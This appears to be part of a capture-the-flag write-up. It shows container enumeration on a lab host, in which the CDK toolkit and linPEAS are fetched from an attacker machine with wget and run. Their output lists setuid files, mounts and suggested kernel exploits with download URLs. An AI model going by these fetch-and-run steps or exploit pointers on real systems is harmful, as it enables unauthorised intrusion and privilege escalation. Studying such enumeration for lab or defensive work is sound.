CDK
Automatically enumerating the Docker container after performing the basic system enumeration
www-data@itrc:/var/tmp$ wget http://10.10.14.172/cdk && chmod 755 ./cdk
--2024-08-04 13:44:28-- http://10.10.14.172/cdk
Connecting to 10.10.14.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12021760 (11M) [application/octet-stream]
Saving to: 'cdk'
cdk 100%[===================>] 11.46M 2.13MB/s in 7.6s
2024-08-04 13:44:36 (1.50 MB/s) - 'cdk' saved [12021760/12021760]
Delivery complete
www-data@itrc:/var/tmp$ ./cdk evaluate --full
./cdk evaluate --full
CDK (Container DucK)
CDK Version(GitCommit): 306f3ced50188ab2c41e0e924c1cde35ecbb520d
Zero-dependency cloudnative k8s/docker/serverless penetration toolkit by cdxy & neargle
Find tutorial, configuration and use-case in https://github.com/cdk-team/CDK/
[ Information Gathering - System Info ]
2024/08/04 13:48:18 current dir: /var/tmp
2024/08/04 13:48:18 current user: www-data uid: 33 gid: 33 home: /var/www
2024/08/04 13:48:18 hostname: itrc
2024/08/04 13:48:18 debian debian 12.6 kernel: 5.15.0-117-generic
2024/08/04 13:48:18 Setuid files found:
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/su
/usr/bin/umount
/bin/chfn
/bin/chsh
/bin/gpasswd
/bin/mount
/bin/newgrp
/bin/passwd
/bin/su
/bin/umount
[ Information Gathering - Services ]
2024/08/04 13:48:18 service found in process:
16 1 sshd
2024/08/04 13:48:18 service found in process:
74 16 sshd
2024/08/04 13:48:18 service found in process:
80 74 sshd
2024/08/04 13:48:18 service found in process:
85 16 sshd
2024/08/04 13:48:18 service found in process:
96 85 sshd
2024/08/04 13:48:18 service found in process:
126 99 ssh
2024/08/04 13:48:18 service found in process:
127 16 sshd
2024/08/04 13:48:18 service found in process:
141 127 sshd
2024/08/04 13:48:18 service found in process:
19370 81 ssh
2024/08/04 13:48:18 service found in process:
19371 16 sshd
2024/08/04 13:48:18 service found in process:
38340 16 sshd
2024/08/04 13:48:18 service found in process:
38350 38340 sshd
2024/08/04 13:48:18 service found in process:
39384 38351 ssh
2024/08/04 13:48:18 service found in process:
39385 16 sshd
2024/08/04 13:48:18 service found in process:
39441 16 sshd
2024/08/04 13:48:18 service found in process:
39453 39441 sshd
[ Information Gathering - Commands and Capabilities ]
2024/08/04 13:48:18 available commands:
curl,wget,find,ps,php,apt,dpkg,apache2,ssh,mysql,vi,capsh,mount,gcc,g++,make,base64,perl
2024/08/04 13:48:18 Capabilities hex of Caps(CapInh|CapPrm|CapEff|CapBnd|CapAmb):
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 00000000a80425fb
CapAmb: 0000000000000000
Cap decode: 0x0000000000000000 =
[*] Maybe you can exploit the Capabilities below:
[ Information Gathering - Mounts ]
0:52 / / rw,relatime - overlay overlay rw,lowerdir=/var/snap/docker/common/var-lib-docker/overlay2/l/3WQ3C6GECW25FR2SN4RFOKG4TV:/var/snap/docker/common/var-lib-docker/overlay2/l/GP2MPJMKU22OWPG4FZ642VPEGN:/var/snap/docker/common/var-lib-docker/overlay2/l/FDOTGAULH5T2KZS73U5NVCQJE7:/var/snap/docker/common/var-lib-docker/overlay2/l/TXS4HPOORTF5GB3LD3GUHGIKNU:/var/snap/docker/common/var-lib-docker/overlay2/l/QUDTWNQJ6VTTIHYR3FJ66RIP4H:/var/snap/docker/common/var-lib-docker/overlay2/l/XGMH4FCGCCEHOVWFCGCIAIUFL5:/var/snap/docker/common/var-lib-docker/overlay2/l/WEJGILRODSNPHU4MQA77XPOQ3V:/var/snap/docker/common/var-lib-docker/overlay2/l/RBJZQPR7R6SFHLKPZZNBY2J6C2:/var/snap/docker/common/var-lib-docker/overlay2/l/RGEQAXVF3RA3D54HDHQ3YM222R:/var/snap/docker/common/var-lib-docker/overlay2/l/NJB5UWLNRM7TTUYTBGQDYDOJTS:/var/snap/docker/common/var-lib-docker/overlay2/l/5JIYXGSFAXXKG76JTAN5M4EMP6:/var/snap/docker/common/var-lib-docker/overlay2/l/PCFQXNILQUQLFUOSZSEIHXHUCE:/var/snap/docker/common/var-lib-docker/overlay2/l/QFWZU5S46PYXI3MHTFNZXHLAZT:/var/snap/docker/common/var-lib-docker/overlay2/l/6TBGSTDJSRQU7NLSHX5FISIRJH:/var/snap/docker/common/var-lib-docker/overlay2/l/JZY7BPDNCQUTLLYVVFZFZGL47M:/var/snap/docker/common/var-lib-docker/overlay2/l/XI7OWJQZNDDGF57OFLK2M5Z7MX:/var/snap/docker/common/var-lib-docker/overlay2/l/4IID2QRZFZQV55X5UDN3UBIUAD:/var/snap/docker/common/var-lib-docker/overlay2/l/PHLPFRA7SEH4HMYQNCPASBEZTB:/var/snap/docker/common/var-lib-docker/overlay2/l/2UL65KUF4CEQSYCFH5H2ENG54T:/var/snap/docker/common/var-lib-docker/overlay2/l/O2OKG6NS23V3DB52RENEJXY43O:/var/snap/docker/common/var-lib-docker/overlay2/l/PZGXH27372BMCIYRYAKO7NAVMG:/var/snap/docker/common/var-lib-docker/overlay2/l/RP4UCVPFMXCSZ3DH3AFOMXATWK:/var/snap/docker/common/var-lib-docker/overlay2/l/KL3O6O6EON2MTVGETTNOSE2R5G:/var/snap/docker/common/var-lib-docker/overlay2/l/TDK47B7SQWHVXX75FPUNSWLRJK:/var/snap/docker/common/var-lib-docker/overlay2/l/DICABLFM4JAFJE4OSULRHMK6B6:/var/snap/docker/common/var-lib-docker/overlay2/l/GCGZGYTD7JJKMMKTXMU4VSAKUL:/var/snap/docker/common/var-lib-docker/overlay2/l/YU5LMNWYJPZSDSCJZNTGIU4ADQ:/var/snap/docker/common/var-lib-docker/overlay2/l/2OY42OWJ7ERA3EILYQB6WLNKAG:/var/snap/docker/common/var-lib-docker/overlay2/l/IK6L5NKAW4OFH3WXJKPAPHXRBD:/var/snap/docker/common/var-lib-docker/overlay2/l/ROPDYYYMKBDNJUX3FLN57X3RRK:/var/snap/docker/common/var-lib-docker/overlay2/l/4NTUSHQPXQ3GQRZHCLGCYMLPT3:/var/snap/docker/common/var-lib-docker/overlay2/l/VATZW6OVAUYEQGRKOABFUKE4BP:/var/snap/docker/common/var-lib-docker/overlay2/l/3NELEOUYXRPWJCCH7PGUCSXV7H:/var/snap/docker/common/var-lib-docker/overlay2/l/OMGG22PGOJ2THUGLW6HSYQPDK4:/var/snap/docker/common/var-lib-docker/overlay2/l/XGUBHZ2IRM6PBPK6BCNMDY3EML:/var/snap/docker/common/var-lib-docker/overlay2/l/S3PZD4YUFU2MOVA3LQFWEL6NI2:/var/snap/docker/common/var-lib-docker/overlay2/l/VRVUHPW47AL32M6YC5SEYBC26N:/var/snap/docker/common/var-lib-docker/overlay2/l/3RUYILXHBY5HPM6ZZ5BBUHVWF2:/var/snap/docker/common/var-lib-docker/overlay2/l/CHIWKBIPR7ZXMWKCEECRW4GCE5:/var/snap/docker/common/var-lib-docker/overlay2/l/JZ2J3K3SDJ7RHHLR42KZWZ36ET:/var/snap/docker/common/var-lib-docker/overlay2/l/HT5UUGVJY25WZQX2MCIXK2HGYM:/var/snap/docker/common/var-lib-docker/overlay2/l/QE5BHXBGHN3EMLHHV5KOHXA3F7,upperdir=/var/snap/docker/common/var-lib-docker/overlay2/a0d2a2c45611874c37594c790addfce14618d81bee570969681a24766a966675/diff,workdir=/var/snap/docker/common/var-lib-docker/overlay2/a0d2a2c45611874c37594c790addfce14618d81bee570969681a24766a966675/work
0:62 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
0:63 / /dev rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64
0:64 / /dev/pts rw,nosuid,noexec,relatime - devpts devpts rw,gid=5,mode=620,ptmxmode=666
0:65 / /sys ro,nosuid,nodev,noexec,relatime - sysfs sysfs ro
0:28 / /sys/fs/cgroup ro,nosuid,nodev,noexec,relatime - cgroup2 cgroup rw,nsdelegate,memory_recursiveprot
0:56 / /dev/mqueue rw,nosuid,nodev,noexec,relatime - mqueue mqueue rw
0:66 / /dev/shm rw,nosuid,nodev,noexec,relatime - tmpfs shm rw,size=65536k,inode64
253:0 /var/snap/docker/common/var-lib-docker/containers/ef9c878c88f2b801920187028f0d536d2610efedd09aab83b7eeccedb9150c55/resolv.conf /etc/resolv.conf rw,relatime - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw
253:0 /var/snap/docker/common/var-lib-docker/containers/ef9c878c88f2b801920187028f0d536d2610efedd09aab83b7eeccedb9150c55/hostname /etc/hostname rw,relatime - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw
253:0 /var/snap/docker/common/var-lib-docker/containers/ef9c878c88f2b801920187028f0d536d2610efedd09aab83b7eeccedb9150c55/hosts /etc/hosts rw,relatime - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw
0:62 /bus /proc/bus ro,nosuid,nodev,noexec,relatime - proc proc rw
0:62 /fs /proc/fs ro,nosuid,nodev,noexec,relatime - proc proc rw
0:62 /irq /proc/irq ro,nosuid,nodev,noexec,relatime - proc proc rw
0:62 /sys /proc/sys ro,nosuid,nodev,noexec,relatime - proc proc rw
0:62 /sysrq-trigger /proc/sysrq-trigger ro,nosuid,nodev,noexec,relatime - proc proc rw
0:67 / /proc/acpi ro,relatime - tmpfs tmpfs ro,inode64
0:63 /null /proc/kcore rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64
0:63 /null /proc/keys rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64
0:63 /null /proc/timer_list rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64
0:68 / /proc/scsi ro,relatime - tmpfs tmpfs ro,inode64
0:69 / /sys/firmware ro,relatime - tmpfs tmpfs ro,inode64
[ Information Gathering - Net Namespace ]
container net namespace isolated.
[ Information Gathering - Sysctl Variables ]
2024/08/04 13:48:18 net.ipv4.conf.all.route_localnet = 0
[ Information Gathering - DNS-Based Service Discovery ]
error when requesting coreDNS: lookup any.any.svc.cluster.local. on 127.0.0.11:53: server misbehaving
error when requesting coreDNS: lookup any.any.any.svc.cluster.local. on 127.0.0.11:53: server misbehaving
[ Discovery - K8s API Server ]
2024/08/04 13:48:18 checking if api-server allows system:anonymous request.
err found while searching local K8s apiserver addr.:
err: cannot find kubernetes api host in ENV
api-server forbids anonymous request.
response:
[ Discovery - K8s Service Account ]
load K8s service account token error.:
open /var/run/secrets/kubernetes.io/serviceaccount/token: no such file or directory
[ Discovery - Cloud Provider Metadata API ]
2024/08/04 13:48:19 failed to dial Alibaba Cloud API.
2024/08/04 13:48:20 failed to dial Azure API.
2024/08/04 13:48:21 failed to dial Google Cloud API.
2024/08/04 13:48:22 failed to dial Tencent Cloud API.
2024/08/04 13:48:23 failed to dial OpenStack API.
2024/08/04 13:48:24 failed to dial Amazon Web Services (AWS) API.
2024/08/04 13:48:25 failed to dial ucloud API.
[ Exploit Pre - Kernel Exploits ]
2024/08/04 13:48:25 refer: https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2022-0847] DirtyPipe
Details: https://dirtypipe.cm4all.com/
Exposure: less probable
Tags: ubuntu=(20.04|21.04),debian=11
Download URL: https://haxx.in/files/dirtypipez.c
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
[ Information Gathering - Sensitive Files ]
.dockerenv - /.dockerenv
/.bashrc - /etc/skel/.bashrc
/.bash_history - /var/www/.bash_history
[ Information Gathering - ASLR ]
2024/08/04 13:48:29 /proc/sys/kernel/randomize_va_space file content: 2
2024/08/04 13:48:29 ASLR is enabled.
[ Information Gathering - Cgroups ]
2024/08/04 13:48:29 /proc/1/cgroup file content:
0::/
2024/08/04 13:48:29 /proc/self/cgroup file added content (compare pid 1) :
PEAS
Automatically enumerating the Docker container after performing the basic system enumeration
www-data@itrc:/var/tmp$ wget http://10.10.14.172/linpeas_CVE_check.sh && chmod 755 ./linpeas_CVE_check.sh
--2024-08-04 13:46:51-- http://10.10.14.172/linpeas_CVE_check.sh
Connecting to 10.10.14.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 828172 (809K) [text/x-sh]
Saving to: 'linpeas_CVE_check.sh'
linpeas_CVE_check.s 100%[===================>] 808.76K 3.30MB/s in 0.2s
2024-08-04 13:46:51 (3.30 MB/s) - 'linpeas_CVE_check.sh' saved [828172/828172]
Delivery complete
Executing PEAS
CVEs
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2022-0847] DirtyPipe
Details: https://dirtypipe.cm4all.com/
Exposure: less probable
Tags: ubuntu=(20.04|21.04),debian=11
Download URL: https://haxx.in/files/dirtypipez.c
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
Protections
Container
Network
Installed Programs
Compilers
DB
SSH
already enumerated